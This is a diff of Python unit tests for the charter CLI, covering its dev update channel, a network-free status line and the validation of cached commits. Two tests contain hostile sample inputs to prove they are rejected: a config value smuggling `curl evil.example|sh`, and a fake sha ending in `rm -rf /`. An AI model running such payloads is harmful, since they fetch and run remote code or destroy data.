+    def test_the_dist_info_is_read_once_per_process(self):
+        """The memo is not an optimisation to be tidied away: `build_label` and
+        `installed_commit` are both reachable from the status line, which renders every
+        turn, and the answer cannot change inside one process — an install replaces the
+        interpreter's own package."""
+        channel._reset_cache_for_tests()
+        self.addCleanup(channel._reset_cache_for_tests)
+        with mock.patch.object(channel, "_read_direct_url",
+                               return_value=git_build()) as reader:
+            for _ in range(5):
+                channel.build_label()
+                channel.installed_commit()
+                channel.installed_ref()
+            self.assertEqual(reader.call_count, 1)
+
+
+class VersionAlwaysPrints(unittest.TestCase):
+    def test_the_cli_prints_a_version_line(self):
+        import subprocess
+        import sys
+        p = subprocess.run([sys.executable, "-m", "charter", "--version"],
+                           capture_output=True, text=True)
+        self.assertEqual(p.returncode, 0, p.stderr)
+        self.assertIn("charter", p.stdout)
+        self.assertIn(__version__, p.stdout)
+
+    def test_a_stable_install_still_prints_exactly_one_word_after_the_name(self):
+        """`commands_update._handoff` verifies an install by comparing `charter
+        --version`'s LAST WORD to the version it asked for. A suffix on the stable path
+        would break every stable update, silently, at the verification step."""
+        with build(None):
+            self.assertEqual(f"charter {channel.build_label()}".split()[-1], __version__)
+
+
+class NewerMeansSomethingElseOnDev(PersonaIso):
+    """`update.newer_than` — the cache-only read the status line makes every turn."""
+
+    def _cache(self, **record) -> None:
+        p = update._cache_file()
+        p.parent.mkdir(parents=True, exist_ok=True)
+        p.write_text(json.dumps(record))
+
+    def test_on_stable_a_cached_head_is_ignored_entirely(self):
+        """A plane that used to be on dev, and is not now, must not keep nudging about
+        commits. The cached `head` is simply not the question being asked."""
+        self._cache(latest=__version__, head="f" * 40)
+        with mock.patch.object(config, "UPDATE", {"channel": "stable"}):
+            self.assertIsNone(update.newer_than(__version__))
+
+    def test_on_dev_a_head_matching_the_installed_commit_is_current(self):
+        head = "a" * 40
+        self._cache(head=head)
+        with mock.patch.object(config, "UPDATE", {"channel": "dev"}), \
+                build(git_build(commit=head)):
+            self.assertIsNone(update.newer_than(__version__))
+
+    def test_on_dev_a_different_head_is_newer_and_reads_as_a_short_commit(self):
+        head = "b" * 34 + "123456"
+        self._cache(head=head)
+        with mock.patch.object(config, "UPDATE", {"channel": "dev"}), \
+                build(git_build(commit="a" * 40)):
+            self.assertEqual(update.newer_than(__version__), head[:7])
+
+    def test_on_dev_with_nothing_cached_it_says_nothing(self):
+        """An indicator that appears because a check did not happen is worse than no
+        indicator (ADR 0013: do not present as checked what was not checked)."""
+        self._cache(latest=__version__)
+        with mock.patch.object(config, "UPDATE", {"channel": "dev"}), \
+                build(git_build()):
+            self.assertIsNone(update.newer_than(__version__))
+
+    def test_on_dev_a_pypi_install_is_behind_by_definition(self):
+        """The state a plane is in for the minutes between declaring the channel and
+        running `charter update`. It asked to track `main` and is running the wheel; the
+        nudge is how it finds out, and `_brand`'s `dev ↑…` is where it says so."""
+        head = "c" * 34 + "abcdef"
+        self._cache(head=head)
+        with mock.patch.object(config, "UPDATE", {"channel": "dev"}), build(None):
+            self.assertEqual(update.newer_than(__version__), head[:7])
+
+    def test_on_stable_the_published_version_comparison_is_untouched(self):
+        self._cache(latest="99.0.0")
+        with mock.patch.object(config, "UPDATE", {"channel": "stable"}), build(None):
+            self.assertEqual(update.newer_than(__version__), "99.0.0")
+        self._cache(latest="0.0.1")
+        with mock.patch.object(config, "UPDATE", {"channel": "stable"}), build(None):
+            self.assertIsNone(update.newer_than(__version__))
+
+
+class TheRenderPathNeverReachesTheNetwork(PersonaIso):
+    """The rule `charter.update`'s module docstring opens with, enforced rather than read.
+
+    The bound is deliberately NOT a counter on one function. A counter on `Path.stat` once
+    missed an `open()`, a `subprocess.run` and the deletion of the very gate it claimed to
+    pin. What is blocked here is the network itself — every socket constructor and the
+    urllib entry point above them — so a call added ANYWHERE under `_brand()`, through any
+    library, fails loudly instead of quietly reaching PyPI or api.github.com from a test
+    run on somebody's laptop.
+
+    `subprocess.Popen` is stubbed rather than blocked: the detached refresh is not a
+    violation of the rule, it is the mechanism that keeps it. What the stub pins is that
+    the refresh is the ONLY way out, and that it is never waited on.
+    """
+
+    def _blocked(self):
+        def boom(*a, **kw):
+            raise AssertionError("the status line's render path made a network call")
+
+        return (
+            mock.patch("socket.socket", boom),
+            mock.patch("socket.create_connection", boom),
+            mock.patch("urllib.request.urlopen", boom),
+            mock.patch("urllib.request.urlretrieve", boom),
+        )
+
+    def _render_brand(self, cache: dict, cfg: dict, doc):
+        p = update._cache_file()
+        p.parent.mkdir(parents=True, exist_ok=True)
+        p.write_text(json.dumps(cache))
+        spawned = []
+        with contextlib.ExitStack() as stack:
+            for patcher in self._blocked():
+                stack.enter_context(patcher)
+            stack.enter_context(mock.patch.object(
+                update.subprocess, "Popen",
+                side_effect=lambda *a, **kw: spawned.append(a) or mock.Mock()))
+            stack.enter_context(mock.patch.object(config, "UPDATE", cfg))
+            stack.enter_context(build(doc))
+            out = statusline._brand()
+        return out, spawned
+
+    def test_a_dev_plane_renders_the_chip_and_the_nudge_without_a_socket(self):
+        head = "d" * 34 + "9876543"[:6]
+        out, spawned = self._render_brand({"head": head}, {"channel": "dev"}, None)
+        self.assertIn("dev", out)
+        self.assertIn(head[:7], out)
+        self.assertLessEqual(len(spawned), 1, "one detached refresh at most, per render")
+
+    def test_a_stable_plane_renders_no_chip(self):
+        """The chip is the whole point of the chip: it must be absent when the channel is
+        stable, or it says nothing when it is present."""
+        out, _ = self._render_brand({"latest": __version__}, {"channel": "stable"}, None)
+        self.assertNotIn("dev", out)
+        self.assertIn(__version__, out)
+
+    def test_the_chip_is_about_the_channel_not_the_build(self):
+        """A plane running a git build with no channel declared is a contributor's laptop,
+        not a plane tracking main. Rendering `dev` there would tell an operator their plane
+        follows a channel it does not follow — and `charter update` would then install the
+        published release, which is the opposite of what the chip led them to expect."""
+        out, _ = self._render_brand({}, {"channel": "stable"}, git_build())
+        self.assertNotIn("dev", out)
+
+    def test_a_render_survives_a_cache_file_that_is_not_json(self):
+        p = update._cache_file()
+        p.parent.mkdir(parents=True, exist_ok=True)
+        p.write_text("{{{ not json")
+        with mock.patch.object(config, "UPDATE", {"channel": "dev"}), \
+                mock.patch.object(update, "maybe_spawn", lambda: None), build(None):
+            self.assertIn(__version__, statusline._brand())
+
+
+class TheBackgroundFetchIsWhereTheNetworkLives(PersonaIso):
+    """`fetch_and_store` runs in the detached child. Two answers, one cache file."""
+
+    def setUp(self):
+        super().setUp()
+        #: Every URL the code under test asked for. RECORDED rather than merely refused:
+        #: `_fetch_head` catches `Exception`, so a stub that raised on an unexpected GET
+        #: would have the raise swallowed and the test would pass while the call happened.
+        #: Caught by mutation — removing the `if dev` gate left this class green until the
+        #: assertion moved onto this list.
+        self.requested: list[str] = []
+
+    def _urlopen(self, responses):
+        """A urlopen stub keyed by URL, so a test can fail one GET and not the other."""
+        def opener(url, timeout=None):
+            self.requested.append(url)
+            if url not in responses:
+                raise AssertionError(f"unexpected GET: {url}")
+            body = responses[url]
+            if isinstance(body, Exception):
+                raise body
+            return contextlib.nullcontext(io.BytesIO(json.dumps(body).encode()))
+        return opener
+
+    def _pypi(self, version):
+        return {"info": {"version": version}}
+
+    def test_a_stable_plane_never_asks_github_anything(self):
+        """The head endpoint is not a free extra: it is a second network call, made from
+        every plane on the machine, to answer a question stable planes do not ask."""
+        opener = self._urlopen({update._URL: self._pypi("9.9.9")})
+        with mock.patch.object(config, "UPDATE", {"channel": "stable"}), \
+                mock.patch("urllib.request.urlopen", opener):
+            self.assertEqual(update.fetch_and_store(), "9.9.9")
+        self.assertEqual(update.load().get("latest"), "9.9.9")
+        self.assertIsNone(update.load().get("head"))
+        # The GETs that were MADE, not the ones that happened to store something. A GET
+        # whose response `_fetch_head` then discards is still a GET, from every plane on
+        # the machine, to answer a question stable planes do not ask.
+        self.assertEqual(self.requested, [update._URL])
+        self.assertNotIn(update._BRANCH_URL, self.requested)
+
+    def test_a_dev_plane_caches_both_answers_and_stamps_the_clock(self):
+        head = "e" * 40
+        opener = self._urlopen({update._URL: self._pypi("9.9.9"),
+                                update._BRANCH_URL: {"commit": {"sha": head}}})
+        with mock.patch.object(config, "UPDATE", {"channel": "dev"}), \
+                mock.patch("urllib.request.urlopen", opener):
+            update.fetch_and_store()
+        got = update.load()
+        self.assertEqual(got["latest"], "9.9.9")
+        self.assertEqual(got["head"], head)
+        self.assertTrue(got.get("ts"))
+
+    def test_a_half_fetch_keeps_what_it_got_and_does_not_stamp_the_clock(self):
+        """`ts` is what `maybe_spawn` measures REFRESH_TTL against, so stamping it after a
+        partial fetch would hold a half-filled cache for a day. And the record is MERGED:
+        a write that rebuilt it would drop the published version an offline moment could
+        not re-fetch, which is what the version-lock rows read."""
+        opener = self._urlopen({update._URL: self._pypi("9.9.9"),
+                                update._BRANCH_URL: OSError("offline")})
+        with mock.patch.object(config, "UPDATE", {"channel": "dev"}), \
+                mock.patch("urllib.request.urlopen", opener):
+            update.fetch_and_store()
+        got = update.load()
+        self.assertEqual(got["latest"], "9.9.9")
+        self.assertNotIn("ts", got)
+
+    def test_an_earlier_head_survives_a_pypi_only_write(self):
+        p = update._cache_file()
+        p.parent.mkdir(parents=True, exist_ok=True)
+        p.write_text(json.dumps({"head": "f" * 40}))
+        opener = self._urlopen({update._URL: self._pypi("9.9.9"),
+                                update._BRANCH_URL: OSError("offline")})
+        with mock.patch.object(config, "UPDATE", {"channel": "dev"}), \
+                mock.patch("urllib.request.urlopen", opener):
+            update.fetch_and_store()
+        self.assertEqual(update.load()["head"], "f" * 40)
+
+    def test_only_a_full_hex_commit_is_ever_cached(self):
+        """The cached head is RENDERED on the status line. A surprising response body must
+        not be able to put arbitrary text there — and 'it is GitHub, it will be a sha' is
+        the assumption, not the guard."""
+        for sha in ("", "not-a-sha", "abc", "g" * 40, "a" * 39, "a" * 41, 12345,
+                    None, ["a" * 40], "a" * 40 + "\nrm -rf /"):
+            with self.subTest(sha=sha):
+                opener = self._urlopen({update._URL: self._pypi("9.9.9"),
+                                        update._BRANCH_URL: {"commit": {"sha": sha}}})
+                with mock.patch.object(config, "UPDATE", {"channel": "dev"}), \
+                        mock.patch("urllib.request.urlopen", opener):
+                    update.fetch_and_store()
+                self.assertIsNone(update.load().get("head"))
+
+    def test_an_uppercase_sha_is_accepted_because_git_writes_both(self):
+        opener = self._urlopen({update._URL: self._pypi("9.9.9"),
+                                update._BRANCH_URL: {"commit": {"sha": "A" * 40}}})
+        with mock.patch.object(config, "UPDATE", {"channel": "dev"}), \
+                mock.patch("urllib.request.urlopen", opener):
+            update.fetch_and_store()
+        self.assertEqual(update.load().get("head"), "A" * 40)
+
+    def test_the_branch_url_is_built_from_constants_and_carries_no_placeholder(self):
+        """The repository is charter's, not the plane's. A committed file that could name
+        the repository would be a committed file that decides which code your machine
+        installs — so the URL is joined from two module constants at import and there is
+        nothing left in it to interpolate."""
+        self.assertEqual(update.DEV_REPO, "diazoxide/charter")
+        self.assertEqual(update.DEV_BRANCH, "main")
+        self.assertEqual(update._BRANCH_URL,
+                         "https://api.github.com/repos/diazoxide/charter/branches/main")
+        for ch in ("{", "}", "%s", "$"):
+            self.assertNotIn(ch, update._BRANCH_URL)
+
+    def test_the_brakes_are_the_same_two_the_stable_channel_has(self):
+        """Not a new mechanism beside the existing ones — the same cache file, the same
+        TTL, the same cooldown, the same timeout."""
+        self.assertEqual(update.REFRESH_TTL, 24 * 3600)
+        self.assertEqual(update.SPAWN_COOLDOWN, 3600)
+        self.assertEqual(update.NET_TIMEOUT, 5)
+
+    def test_the_cooldown_still_bounds_a_dev_plane_to_one_spawn(self):
+        """`maybe_spawn` is called from `_brand` on every render. The dev channel changed
+        what the child fetches and must not have changed how often it is started."""
+        calls = []
+        with mock.patch.object(config, "UPDATE", {"channel": "dev"}), \
+                mock.patch.object(update.subprocess, "Popen",
+                                  side_effect=lambda *a, **kw: calls.append(a) or mock.Mock()):
+            for _ in range(20):
+                update.maybe_spawn()
+        self.assertEqual(len(calls), 1)
+
+
+class NoTestHereOpensASocket(unittest.TestCase):
+    """A guard on the guards. If `socket.socket` is reachable in this module's tests, the
+    blocks above are patching something the code under test does not use."""
+
+    def test_socket_is_the_thing_being_blocked(self):
+        self.assertTrue(hasattr(socket, "socket"))
+        self.assertTrue(hasattr(socket, "create_connection"))
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/tests/test_dev_update_command.py
+++ b/tests/test_dev_update_command.py
@@ -1,0 +1,275 @@
+"""`charter update` on the dev channel — what it installs, and what it can never install.
+
+The stable path resolves a published version and installs `charter-cp==<version>`. The dev
+path has no version to resolve: dev builds are never published, so the target is a git ref
+and the requirement is a module constant.
+
+**The single most important assertion in this file is that no value from `charter.toml`
+reaches an argv.** `charter.toml` is committed and arrives from someone else's machine, and
+the thing on the other end of this path is a command that installs software onto the
+operator's machine. `instance.UPDATE_CHANNELS` is the closed set that makes that true;
+these tests are what would go red if the install command were ever built by interpolating
+anything an operator can write.
+
+Nothing here installs anything. `util.run` is stubbed at the one seam every installer call
+goes through, and the tests assert on the argv it was handed.
+"""
+
+from __future__ import annotations
+
+import argparse
+import unittest
+from pathlib import Path
+from unittest import mock
+
+from charter import __version__, commands_update, config, hooks, update
+from tests._isolation import PersonaIso
+
+
+class Ran:
+    """A `util.run` stand-in that records argv and answers success."""
+
+    def __init__(self, version_line=f"charter {__version__}+dev (main @ abc1234)"):
+        self.calls: list[list[str]] = []
+        self.version_line = version_line
+
+    def __call__(self, cmd, cwd=None, check=True, capture=True, input=None, env=None,
+                 timeout=None):
+        self.calls.append(list(cmd))
+        out = self.version_line if cmd[-1] == "--version" else ""
+        return mock.Mock(returncode=0, stdout=out, stderr="")
+
+    @property
+    def flat(self) -> str:
+        return " ".join(a for call in self.calls for a in call)
+
+
+class TheDevRequirementIsAConstant(unittest.TestCase):
+    def test_the_spec_is_exactly_what_the_docs_tell_you_to_type(self):
+        self.assertEqual(commands_update.DEV_SPEC,
+                         "git+https://github.com/diazoxide/charter@main")
+
+    def test_the_spec_carries_no_interpolation_point_of_any_kind(self):
+        """`_sync_to` builds its command with `a.format(version=…)`. A dev spec run through
+        that same line would put a `str.format` call between a committed config file and an
+        install command — which is why `dev_install_argv` is a separate function and why
+        this asserts there is nothing in the string for a format call to reach."""
+        for ch in ("{", "}", "%s", "$", "`", ";", "&", "|", "\n", " "):
+            self.assertNotIn(ch, commands_update.DEV_SPEC, ch)
+
+    def test_both_installers_pass_the_spec_as_one_argv_element(self):
+        """A list argv, never a shell string — so the spec is one element and cannot be
+        re-split, and `util.run` never invokes a shell to re-split it."""
+        for name, argv in commands_update._DEV_INSTALLERS.items():
+            with self.subTest(installer=name):
+                self.assertIn(commands_update.DEV_SPEC, argv)
+                self.assertEqual(sum(a == commands_update.DEV_SPEC for a in argv), 1)
+                self.assertEqual(argv[0], name)
+
+    def test_the_argv_is_a_fresh_list_not_the_tables_own(self):
+        """Handed straight to `util.run`; a module-level list handed out is a list something
+        can edit for the life of the process (same reason `instance.density_slots` copies)."""
+        with mock.patch.object(commands_update, "installer_for", return_value=("uv", [])):
+            first = commands_update.dev_install_argv()[1]
+            first.append("--dangerous")
+            second = commands_update.dev_install_argv()[1]
+        self.assertNotIn("--dangerous", second)
+
+    def test_an_install_charter_does_not_own_is_named_rather_than_guessed_at(self):
+        with mock.patch.object(commands_update, "installer_for",
+                               return_value=("unknown", None)):
+            name, argv = commands_update.dev_install_argv()
+        self.assertEqual(name, "unknown")
+        self.assertIsNone(argv)
+
+
+class TheDevInstallRunsTheGitCommand(PersonaIso):
+    def setUp(self):
+        super().setUp()
+        (self.tmp / "charter.toml").write_text('schema = 1\n[update]\nchannel = "dev"\n')
+        config.use(self.tmp)
+        self.ran = Ran()
+        self.enterContext(mock.patch.object(commands_update.util, "run", self.ran))
+        # The real uv argv, so `_sync_to`'s `{version}` substitution and `dev_install_argv`'s
+        # constant lookup both behave exactly as they do on a machine uv owns. A stub argv
+        # here would let the two paths pass while installing nothing recognisable.
+        self.enterContext(mock.patch.object(
+            commands_update, "installer_for",
+            return_value=("uv", list(commands_update._INSTALLERS["uv"]))))
+        self.enterContext(mock.patch.object(commands_update.shutil, "which",
+                                            return_value="/usr/bin/x"))
+        self.enterContext(mock.patch.object(commands_update, "_move_harness"))
+        self.enterContext(mock.patch.object(commands_update, "_refresh_plugin"))
+
+    def _args(self, **kw):
+        return argparse.Namespace(**{"to": None, "bump": False, **kw})
+
+    def test_it_installs_the_git_spec_and_never_a_pypi_pin(self):
+        self.assertEqual(commands_update.cmd_update(self._args()), 0)
+        self.assertIn(commands_update.DEV_SPEC, self.ran.flat)
+        self.assertNotIn("charter-cp==", self.ran.flat)
+
+    def test_the_word_dev_never_appears_as_an_argv_element(self):
+        """The channel is COMPARED, never carried. Every element of every command charter
+        runs on this path is a module constant or a path charter derived itself — and
+        `"dev"` is the value that would be there if any of that stopped being true."""
+        commands_update.cmd_update(self._args())
+        for call in self.ran.calls:
+            for element in call:
+                self.assertNotEqual(element, "dev")
+                self.assertNotEqual(element, "stable")
+
+    def test_a_hostile_channel_value_never_reaches_a_command(self):
+        """The end-to-end statement of the closed set: a committed charter.toml carrying an
+        injection payload does not reach a command line, because it does not even reach the
+        dev branch — `update_of` degraded it to `stable` at the config boundary."""
+        (self.tmp / "charter.toml").write_text(
+            'schema = 1\n[update]\nchannel = "dev\\" ; curl evil.example|sh ; \\""\n')
+        config.use(self.tmp)
+        with mock.patch.object(commands_update, "_latest", return_value=__version__), \
+                mock.patch.object(commands_update, "_handoff", return_value=(True, "")):
+            commands_update.cmd_update(self._args())
+        self.assertNotIn("evil.example", self.ran.flat)
+        self.assertNotIn("curl", self.ran.flat)
+        self.assertNotIn(commands_update.DEV_SPEC, self.ran.flat)
+
+    def test_the_plugin_is_force_refreshed_because_a_version_update_cannot_see_the_change(self):
+        commands_update.cmd_update(self._args())
+        commands_update._refresh_plugin.assert_called_once()
+
+    def test_the_harness_artifact_moves_on_this_path_too(self):
+        commands_update.cmd_update(self._args())
+        commands_update._move_harness.assert_called_once()
+
+    def test_the_install_is_proved_by_the_binary_reporting_a_dev_build(self):
+        """A dev install cannot be verified the way the stable one is — the version number
+        does not move, which is the whole reason dev builds are not published. What DOES
+        change is that the binary now reports a PEP 610 dev build; a `charter --version`
+        still saying plain `0.51.0` means `uv` exited 0 against something else."""
+        self.ran.version_line = f"charter {__version__}"
+        self.assertEqual(commands_update.cmd_update(self._args()), 1)
+
+    def test_a_failed_install_stops_before_the_artifacts(self):
+        def fail(cmd, **kw):
+            self.ran.calls.append(list(cmd))
+            return mock.Mock(returncode=1, stdout="", stderr="no network")
+
+        with mock.patch.object(commands_update.util, "run", fail):
+            self.assertEqual(commands_update.cmd_update(self._args()), 1)
+        commands_update._move_harness.assert_not_called()
+        commands_update._refresh_plugin.assert_not_called()
+
+    def test_bump_is_refused_because_a_commit_is_not_a_pin(self):
+        """`[charter] version` names a PUBLISHED release a whole team conforms to. Writing a
+        commit of `main` into a committed file would put every teammate onto an unreviewed
+        merge on their next session."""
+        before = (self.tmp / "charter.toml").read_text()
+        self.assertEqual(commands_update.cmd_update(self._args(bump=True)), 0)
+        self.assertEqual((self.tmp / "charter.toml").read_text(), before)
+
+    def test_an_explicit_target_overrides_the_channel_for_that_run(self):
+        """How somebody goes back to a release without first editing charter.toml. An
+        update that silently installed `main` because the plane said so would be ignoring
+        the version the operator typed on the line in front of them."""
+        with mock.patch.object(commands_update, "_handoff", return_value=(True, "")):
+            self.assertEqual(commands_update.cmd_update(self._args(to="0.50.1")), 0)
+        self.assertIn("charter-cp==0.50.1", self.ran.flat)
+        self.assertNotIn(commands_update.DEV_SPEC, self.ran.flat)
+
+    def test_a_stable_plane_is_completely_unaffected(self):
+        (self.tmp / "charter.toml").write_text("schema = 1\n")
+        config.use(self.tmp)
+        with mock.patch.object(commands_update, "_latest", return_value="9.9.9"), \
+                mock.patch.object(commands_update, "_handoff", return_value=(True, "")):
+            self.assertEqual(commands_update.cmd_update(self._args()), 0)
+        self.assertIn("charter-cp==9.9.9", self.ran.flat)
+        self.assertNotIn(commands_update.DEV_SPEC, self.ran.flat)
+
+
+class TheProbeAndCheckoutRefusalsStillHold(PersonaIso):
+    """Both refusals sit ABOVE the channel branch, and both must stay there.
+
+    A news entry's `check:` is dispatched as a charter subcommand, so a probe that reached
+    the installer would reinstall the machine to answer a question about it (#314) — and
+    the dev branch is a second door into the same installer. Same for a charter checkout:
+    installing over the tree you are editing is never what "let me try the update command"
+    meant, and it is *more* tempting to get wrong on a channel whose whole point is running
+    unreleased code.
+    """
+
+    def setUp(self):
+        super().setUp()
+        (self.tmp / "charter.toml").write_text('schema = 1\n[update]\nchannel = "dev"\n')
+        config.use(self.tmp)
+        self.ran = Ran()
+        self.enterContext(mock.patch.object(commands_update.util, "run", self.ran))
+
+    def _args(self):
+        return argparse.Namespace(to=None, bump=False)
+
+    def test_a_news_probe_cannot_install_a_dev_build(self):
+        from charter import news
+        with mock.patch.object(news, "probing", return_value=True), \
+                mock.patch.object(news, "refuse_mutation"):
+            self.assertEqual(commands_update.cmd_update(self._args()), 2)
+        self.assertEqual(self.ran.calls, [])
+
+    def test_a_charter_checkout_cannot_install_over_itself(self):
+        from charter import doctor
+        with mock.patch.object(doctor, "_is_charter_checkout", return_value=True):
+            self.assertEqual(commands_update.cmd_update(self._args()), 2)
+        self.assertEqual(self.ran.calls, [])
+
+
+class APinAndTheDevChannelAreNotSettledSilently(PersonaIso):
+    """`hooks._autosync_version_lock` installs the pinned version at session start.
+
+    A dev build carries the SAME version number as the release it was built from, so the
+    "already conformed" equality never catches it: without this guard a plane would get one
+    `charter update` to the dev channel and be quietly returned to the PyPI wheel at the
+    next session start, every session, with nothing anywhere saying so.
+
+    Reported rather than resolved, for the reason that function's own docstring gives: the
+    install replaces the binary that enforces the credential guard, and session start has
+    nobody to ask.
+    """
+
+    def _declare(self, text):
+        (self.tmp / "charter.toml").write_text(text)
+        config.use(self.tmp)
+
+    def test_a_dev_plane_with_a_pin_installs_nothing_and_says_why(self):
+        self._declare('schema = 1\n[charter]\nversion = "9.9.9"\n'
+                      '[update]\nchannel = "dev"\n')
+        from charter import commands
+        with mock.patch.object(commands, "sync_to") as sync:
+            msg = hooks._autosync_version_lock()
+        sync.assert_not_called()
+        self.assertIsNotNone(msg)
+        self.assertIn("dev", msg)
+        self.assertIn("9.9.9", msg)
+
+    def test_a_stable_plane_with_a_pin_still_conforms(self):
+        """The guard must be a branch on the channel, not a disabling of the feature."""
+        self._declare('schema = 1\n[charter]\nversion = "9.9.9"\n')
+        from charter import commands
+        with mock.patch.object(commands, "sync_to", return_value=(True, "9.9.9")) as sync:
+            msg = hooks._autosync_version_lock()
+        sync.assert_called_once()
+        self.assertIn("auto-updated", msg)
+
+    def test_a_dev_plane_with_no_pin_is_silent(self):
+        self._declare('schema = 1\n[update]\nchannel = "dev"\n')
+        self.assertIsNone(hooks._autosync_version_lock())
+
+
+class TheSharedInstallNoteStillApplies(unittest.TestCase):
+    def test_the_dev_path_reuses_the_one_note_about_a_machine_global_binary(self):
+        """One binary, many planes — declaring the dev channel in one plane moves the
+        charter every plane on the machine uses. That is exactly what `SHARED_INSTALL_NOTE`
+        exists to say, and a second wording of it would be a second thing to keep true."""
+        self.assertIn("machine-global", update.SHARED_INSTALL_NOTE)
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/tests/test_dev_update_command.py
+++ b/tests/test_dev_update_command.py
@@ -22,7 +22,7 @@ import unittest
 from pathlib import Path
 from unittest import mock
 
-from charter import __version__, commands_update, config, hooks, update
+from charter import __version__, commands_update, config, hooks, update, util
 from tests._isolation import PersonaIso
 
 
@@ -74,6 +74,21 @@ class TheDevRequirementIsAConstant(unittest.TestCase):
             first.append("--dangerous")
             second = commands_update.dev_install_argv()[1]
         self.assertNotIn("--dangerous", second)
+
+    def test_the_argv_comes_back_verbatim_with_no_format_call_on_the_path(self):
+        """`dev_install_argv`'s docstring says "there is no format call on this path", and
+        that claim is the whole reason it is a separate function from `_sync_to`.
+
+        Pinned with a canary, because `DEV_SPEC` deliberately carries no braces (asserted
+        above): a `str.format` added to this line would be a silent no-op TODAY and a live
+        interpolation point between a committed config file and an install command the day
+        the spec gains a placeholder. The canary makes the mutation visible now instead.
+        """
+        canary = "git+https://example.invalid/{version}@{ref}"
+        with mock.patch.dict(commands_update._DEV_INSTALLERS, {"uv": ["uv", canary]}), \
+                mock.patch.object(commands_update, "installer_for",
+                                  return_value=("uv", [])):
+            self.assertEqual(commands_update.dev_install_argv()[1], ["uv", canary])
 
     def test_an_install_charter_does_not_own_is_named_rather_than_guessed_at(self):
         with mock.patch.object(commands_update, "installer_for",
@@ -261,6 +276,63 @@ class APinAndTheDevChannelAreNotSettledSilently(PersonaIso):
     def test_a_dev_plane_with_no_pin_is_silent(self):
         self._declare('schema = 1\n[update]\nchannel = "dev"\n')
         self.assertIsNone(hooks._autosync_version_lock())
+
+    def test_a_pin_equal_to_the_running_version_is_silent_on_dev_too(self):
+        """The common shape of the conflict — *pin the current release AND opt into dev* —
+        and the one case the guard deliberately does not speak up about.
+
+        The dev check sits BELOW `locked == __version__`, so a plane in this state says
+        nothing. That is correct rather than a gap: a dev build carries the same version
+        number as the release it was built from, so while the two agree there is nothing to
+        install and nothing to undo. The moment the pin moves — a teammate bumps it after
+        the next release — the equality breaks, the guard fires, and it fires at exactly
+        the moment it would otherwise have reinstalled the wheel over the dev build.
+
+        The test above uses `9.9.9`, so it never reached this case; without this one,
+        moving the guard ABOVE the equality return (turning a benign state into a message
+        on every single session) would have been invisible.
+        """
+        self._declare(f'schema = 1\n[charter]\nversion = "{__version__}"\n'
+                      f'[update]\nchannel = "dev"\n')
+        from charter import commands
+        with mock.patch.object(commands, "sync_to") as sync:
+            self.assertIsNone(hooks._autosync_version_lock())
+        sync.assert_not_called()
+
+
+class TheRefreshIsNeverFatal(PersonaIso):
+    """`_refresh_plugin` promises "best-effort, never fatal", and by the time it runs the
+    CLI has already been replaced and the harness artifact already moved.
+
+    An exception escaping here ends a SUCCESSFUL update in a traceback — and `force_refresh`
+    calls `util.run` with a 120s timeout, so `ProcTimeout` was a live path, as was a
+    `claude` removed from PATH between `shutil.which` and the exec.
+    """
+
+    def _refresh_with(self, error):
+        from charter import plugincache
+        with mock.patch.object(plugincache, "available", return_value=True), \
+                mock.patch.object(plugincache, "force_refresh", side_effect=error):
+            commands_update._refresh_plugin()      # must simply return
+
+    def test_a_timeout_out_of_force_refresh_does_not_escape(self):
+        self._refresh_with(util.ProcTimeout(["claude"], 120))
+
+    def test_a_missing_binary_does_not_escape(self):
+        self._refresh_with(FileNotFoundError("claude"))
+
+    def test_force_refresh_itself_returns_rather_than_raising_on_a_timeout(self):
+        """The layer below: the guard in `_refresh_plugin` is the belt, and this is the
+        braces. Both, because `plugincache.force_refresh` is also called directly."""
+        from charter import plugincache
+        rows = [{"id": "charter@charter", "scope": "user", "installPath": "/y"}]
+        with mock.patch.object(plugincache, "available", return_value=True), \
+                mock.patch.object(plugincache, "_claude_json", return_value=rows), \
+                mock.patch.object(plugincache.util, "run",
+                                  side_effect=util.ProcTimeout(["claude"], 120)):
+            ok, detail = plugincache.force_refresh()
+        self.assertFalse(ok)
+        self.assertTrue(detail)
 
 
 class TheSharedInstallNoteStillApplies(unittest.TestCase):

--- a/tests/test_plugin_freshness.py
+++ b/tests/test_plugin_freshness.py
@@ -1,0 +1,419 @@
+"""The installed plugin versus the marketplace clone — by CONTENT, not by version string.
+
+The gap this covers is live, and was measured on a real machine while it was written: the
+marketplace clone at ``main``, the installed cache at whatever ``main`` was when the plugin
+was last installed, **both saying 0.51.0**, 45 files apart — ``skills/secrets/SKILL.md``
+and ``skills/browser/SKILL.md`` among them — and ``claude plugin update charter@charter``
+correctly answering *already at the latest version*. Version-keyed updates cannot see this,
+because charter's plugin version moves exactly once per release and the clone moves
+whenever Claude Code re-fetches it.
+
+Two consequences, both tested here:
+
+* `doctor.check_plugin_freshness` compares files and says so.
+* `charter update` on the dev channel force-refreshes, because uninstall + reinstall is the
+  only mechanism that repopulates a version-keyed cache directory.
+
+**What is NOT broken, so that nothing here "fixes" it:** ``hooks/hooks.json`` invokes
+``charter hook … --plugin-version 0.51.0`` — the *command*, resolved from ``PATH``, i.e.
+the ``uv tool`` install. Hook behaviour follows the CLI, not the plugin's bundled copy of
+``charter/*.py``. The staleness that bites is the skills, which are text the model loads.
+
+No test here runs `claude`. `plugincache._claude_json` is the one seam every call goes
+through and it is stubbed; a test that reached the real CLI would mutate the developer's
+own plugin installation.
+"""
+
+from __future__ import annotations
+
+import unittest
+from pathlib import Path
+from unittest import mock
+
+from charter import config, doctor, plugincache
+from tests._isolation import PersonaIso
+
+REPO = Path(__file__).resolve().parents[1]
+
+
+def tree(root: Path, files: dict[str, str]) -> Path:
+    for rel, body in files.items():
+        p = root / rel
+        p.parent.mkdir(parents=True, exist_ok=True)
+        p.write_text(body)
+    return root
+
+
+PLUGIN = {
+    ".claude-plugin/plugin.json": '{"name": "charter", "version": "0.51.0"}',
+    "hooks/hooks.json": '{"hooks": {}}',
+    "skills/secrets/SKILL.md": "# secrets\n",
+    "skills/browser/SKILL.md": "# browser\n",
+}
+
+
+class TheHashCoversWhatThePluginLoads(PersonaIso):
+    def _pair(self, extra_left=None, extra_right=None):
+        left = tree(self.tmp / "installed", {**PLUGIN, **(extra_left or {})})
+        right = tree(self.tmp / "clone", {**PLUGIN, **(extra_right or {})})
+        return left, right
+
+    def test_two_identical_trees_hash_the_same(self):
+        left, right = self._pair()
+        self.assertEqual(plugincache.content_hash(left), plugincache.content_hash(right))
+        self.assertIsNotNone(plugincache.content_hash(left))
+
